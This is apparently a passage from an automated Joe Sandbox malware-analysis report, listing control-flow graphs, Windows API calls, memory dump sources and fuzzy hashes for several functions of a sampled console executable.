                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1142 7ff706ec2978-7ff706ec29b6 1143 7ff706ec29b9-7ff706ec29c1 1142->1143 1143->1143 1144 7ff706ec29c3-7ff706ec29c5 1143->1144 1145 7ff706ece441 1144->1145 1146 7ff706ec29cb-7ff706ec29cf 1144->1146 1147 7ff706ec29d2-7ff706ec29da 1146->1147 1148 7ff706ec2a1e-7ff706ec2a3e FindFirstFileW 1147->1148 1149 7ff706ec29dc-7ff706ec29e1 1147->1149 1151 7ff706ece435-7ff706ece439 1148->1151 1152 7ff706ec2a44-7ff706ec2a5c FindClose 1148->1152 1149->1148 1150 7ff706ec29e3-7ff706ec29eb 1149->1150 1150->1147 1153 7ff706ec29ed-7ff706ec2a1c call 7ff706ec8f80 1150->1153 1151->1145 1154 7ff706ec2a62-7ff706ec2a6e 1152->1154 1155 7ff706ec2ae3-7ff706ec2ae5 1152->1155 1157 7ff706ec2a70-7ff706ec2a78 1154->1157 1158 7ff706ece3f7-7ff706ece3ff 1155->1158 1159 7ff706ec2aeb-7ff706ec2b10 _wcsnicmp 1155->1159 1157->1157 1161 7ff706ec2a7a-7ff706ec2a8d 1157->1161 1159->1154 1162 7ff706ec2b16-7ff706ece3f1 _wcsicmp 1159->1162 1161->1145 1164 7ff706ec2a93-7ff706ec2a97 1161->1164 1162->1154 1162->1158 1165 7ff706ece404-7ff706ece407 1164->1165 1166 7ff706ec2a9d-7ff706ec2ade memmove call 7ff706ec13e0 1164->1166 1167 7ff706ece40b-7ff706ece413 1165->1167 1166->1150 1167->1167 1169 7ff706ece415-7ff706ece42b memmove 1167->1169 1169->1151
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d41d0de1647fb3a2a3695abdeb6e65bb161f4093d64720d8f5557838e3a5be7f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D751E562B1878289EA30AF15AD642BBE690FF54BB4FC44230DE6E077D1DF3CE5468610
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC4A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1207 7ff706ec4a14-7ff706ec4a3e GetEnvironmentStringsW 1208 7ff706ec4a40-7ff706ec4a46 1207->1208 1209 7ff706ec4aae-7ff706ec4ac5 1207->1209 1210 7ff706ec4a59-7ff706ec4a8f GetProcessHeap HeapAlloc 1208->1210 1211 7ff706ec4a48-7ff706ec4a52 1208->1211 1213 7ff706ec4a91-7ff706ec4a9a memmove 1210->1213 1214 7ff706ec4a9f-7ff706ec4aa9 FreeEnvironmentStringsW 1210->1214 1211->1211 1212 7ff706ec4a54-7ff706ec4a57 1211->1212 1212->1210 1212->1211 1213->1214 1214->1209
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A28
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A66
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memmove.MSVCRT(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1623332820-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b8879f185e72891e3b07a1b34119d03775725cce98bdb9dd7de49bc877eabc3e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75115126A15B52C2DA10AB55BC2413AFBE0FF89F94B999034DE4E03784EF3DE4428764
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC4D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 643 7ff706ec4d5c-7ff706ec4e4b InitializeCriticalSection call 7ff706ec58e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff706ec0580 call 7ff706ec4a14 call 7ff706ec4ad0 call 7ff706ec5554 GetCommandLineW 654 7ff706ec4e4d-7ff706ec4e54 643->654 654->654 655 7ff706ec4e56-7ff706ec4e61 654->655 656 7ff706ec51cf-7ff706ec51e3 call 7ff706eb3278 call 7ff706ec4c1c 655->656 657 7ff706ec4e67-7ff706ec4e7b call 7ff706ec2e44 655->657 663 7ff706ec4e81-7ff706ec4ec3 GetCommandLineW call 7ff706ec13e0 call 7ff706ebca40 657->663 664 7ff706ec51ba-7ff706ec51ce call 7ff706eb3278 call 7ff706ec4c1c 657->664 663->664 674 7ff706ec4ec9-7ff706ec4ee8 call 7ff706ec417c call 7ff706ec2394 663->674 664->656 678 7ff706ec4eed-7ff706ec4ef5 674->678 678->678 679 7ff706ec4ef7-7ff706ec4f1f call 7ff706ebaa54 678->679 682 7ff706ec4f21-7ff706ec4f30 679->682 683 7ff706ec4f95-7ff706ec4fee GetConsoleOutputCP GetCPInfo call 7ff706ec51ec GetProcessHeap HeapAlloc 679->683 682->683 685 7ff706ec4f32-7ff706ec4f39 682->685 688 7ff706ec5012-7ff706ec5018 683->688 689 7ff706ec4ff0-7ff706ec5006 GetConsoleTitleW 683->689 685->683 687 7ff706ec4f3b-7ff706ec4f77 call 7ff706eb3278 GetWindowsDirectoryW 685->687 695 7ff706ec51b1-7ff706ec51b9 call 7ff706ec4c1c 687->695 696 7ff706ec4f7d-7ff706ec4f90 call 7ff706ec3c24 687->696 693 7ff706ec507a-7ff706ec507e 688->693 694 7ff706ec501a-7ff706ec5024 call 7ff706ec3578 688->694 689->688 692 7ff706ec5008-7ff706ec500f 689->692 692->688 697 7ff706ec5080-7ff706ec50b3 call 7ff706edb89c call 7ff706eb586c call 7ff706eb3240 call 7ff706ec3448 693->697 698 7ff706ec50eb-7ff706ec5161 GetModuleHandleW GetProcAddress * 3 693->698 694->693 709 7ff706ec5026-7ff706ec5030 694->709 695->664 696->683 724 7ff706ec50d2-7ff706ec50d7 call 7ff706eb3278 697->724 725 7ff706ec50b5-7ff706ec50d0 call 7ff706ec3448 * 2 697->725 702 7ff706ec516f 698->702 703 7ff706ec5163-7ff706ec5167 698->703 708 7ff706ec5172-7ff706ec51af free call 7ff706ec8f80 702->708 703->702 707 7ff706ec5169-7ff706ec516d 703->707 707->702 707->708 713 7ff706ec5032-7ff706ec5059 GetStdHandle GetConsoleScreenBufferInfo 709->713 714 7ff706ec5075 call 7ff706edcff0 709->714 718 7ff706ec5069-7ff706ec5073 713->718 719 7ff706ec505b-7ff706ec5067 713->719 714->693 718->693 718->714 719->693 728 7ff706ec50dc-7ff706ec50e6 GlobalFree 724->728 725->728 728->698
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4D9A
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF706EDC6DB), ref: 00007FF706EC58EF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4DBB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EC4DCA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4DE0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EC4DEE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4E04
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC0589
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: SetConsoleMode.KERNELBASE ref: 00007FF706EC059E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC05AF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: GetConsoleMode.KERNELBASE ref: 00007FF706EC05C5
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC05EF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: GetConsoleMode.KERNELBASE ref: 00007FF706EC0605
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC0632
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: SetConsoleMode.KERNELBASE ref: 00007FF706EC0647
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A28
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A66
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: memmove.MSVCRT(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB8798), ref: 00007FF706EC4AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB8798), ref: 00007FF706EC4AEF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF706EC4E35), ref: 00007FF706EC55DA
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC5623
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC5667
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC56BE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC5702
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4E35
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4E81
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4F69
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4F95
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FB0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FD8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FF8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC5037
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC504B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC50DF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC50F2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC510F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC5130
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC514A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC5175
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: _get_osfhandle.MSVCRT ref: 00007FF706EC3584
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC359C
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35C3
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35D9
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35ED
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC3602
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1049357271-3021193919
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b126f1702366f536cdc0290ce0484146886976d8b64aeb935690e35a9b1b7135
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59C16C65A08B46D6EA00BB11EC351BBF7A1FF89BA4FC48134D90E473A5DF3CA4468360
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC3C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 732 7ff706ec3c24-7ff706ec3c61 733 7ff706ec3c67-7ff706ec3c99 call 7ff706ebaf14 call 7ff706ebca40 732->733 734 7ff706ecec5a-7ff706ecec5f 732->734 743 7ff706ec3c9f-7ff706ec3cb2 call 7ff706ebb900 733->743 744 7ff706ecec97-7ff706ececa1 call 7ff706ec855c 733->744 734->733 735 7ff706ecec65-7ff706ecec6a 734->735 737 7ff706ec412e-7ff706ec415b call 7ff706ec8f80 735->737 743->744 749 7ff706ec3cb8-7ff706ec3cbc 743->749 750 7ff706ec3cbf-7ff706ec3cc7 749->750 750->750 751 7ff706ec3cc9-7ff706ec3ccd 750->751 752 7ff706ec3cd2-7ff706ec3cd8 751->752 753 7ff706ec3ce5-7ff706ec3d62 GetCurrentDirectoryW towupper iswalpha 752->753 754 7ff706ec3cda-7ff706ec3cdf 752->754 756 7ff706ec3fb8 753->756 757 7ff706ec3d68-7ff706ec3d6c 753->757 754->753 755 7ff706ec3faa-7ff706ec3fb3 754->755 755->752 759 7ff706ec3fc6-7ff706ec3fec GetLastError call 7ff706ec855c call 7ff706eca5d6 756->759 757->756 758 7ff706ec3d72-7ff706ec3dcd towupper GetFullPathNameW 757->758 758->759 760 7ff706ec3dd3-7ff706ec3ddd 758->760 762 7ff706ec3ff1-7ff706ec4007 call 7ff706ec855c _local_unwind 759->762 760->762 763 7ff706ec3de3-7ff706ec3dfb 760->763 773 7ff706ec400c-7ff706ec4022 GetLastError 762->773 765 7ff706ec3e01-7ff706ec3e11 763->765 766 7ff706ec40fe-7ff706ec4119 call 7ff706ec855c _local_unwind 763->766 765->766 771 7ff706ec3e17-7ff706ec3e28 765->771 778 7ff706ec411a-7ff706ec412c call 7ff706ebff70 call 7ff706ec855c 766->778 772 7ff706ec3e2c-7ff706ec3e34 771->772 772->772 775 7ff706ec3e36-7ff706ec3e3f 772->775 776 7ff706ec3e95-7ff706ec3e9c 773->776 777 7ff706ec4028-7ff706ec402b 773->777 779 7ff706ec3e42-7ff706ec3e55 775->779 781 7ff706ec3ecf-7ff706ec3ed3 776->781 782 7ff706ec3e9e-7ff706ec3ec2 call 7ff706ec2978 776->782 777->776 780 7ff706ec4031-7ff706ec4047 call 7ff706ec855c _local_unwind 777->780 778->737 784 7ff706ec3e66-7ff706ec3e8f GetFileAttributesW 779->784 785 7ff706ec3e57-7ff706ec3e60 779->785 801 7ff706ec404c-7ff706ec4062 call 7ff706ec855c _local_unwind 780->801 788 7ff706ec3ed5-7ff706ec3ef7 GetFileAttributesW 781->788 789 7ff706ec3f08-7ff706ec3f0b 781->789 793 7ff706ec3ec7-7ff706ec3ec9 782->793 784->773 784->776 785->784 791 7ff706ec3f9d-7ff706ec3fa5 785->791 794 7ff706ec4067-7ff706ec4098 GetLastError call 7ff706ec855c _local_unwind 788->794 795 7ff706ec3efd-7ff706ec3f02 788->795 797 7ff706ec3f1e-7ff706ec3f40 SetCurrentDirectoryW 789->797 798 7ff706ec3f0d-7ff706ec3f11 789->798 791->779 793->781 793->801 803 7ff706ec409d-7ff706ec40b3 call 7ff706ec855c _local_unwind 794->803 795->789 795->803 799 7ff706ec3f46-7ff706ec3f69 call 7ff706ec498c 797->799 800 7ff706ec40b8-7ff706ec40de GetLastError call 7ff706ec855c _local_unwind 797->800 798->799 805 7ff706ec3f13-7ff706ec3f1c 798->805 815 7ff706ec40e3-7ff706ec40f9 call 7ff706ec855c _local_unwind 799->815 816 7ff706ec3f6f-7ff706ec3f98 call 7ff706ec417c 799->816 800->815 801->794 803->800 805->797 805->799 815->766 816->778
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
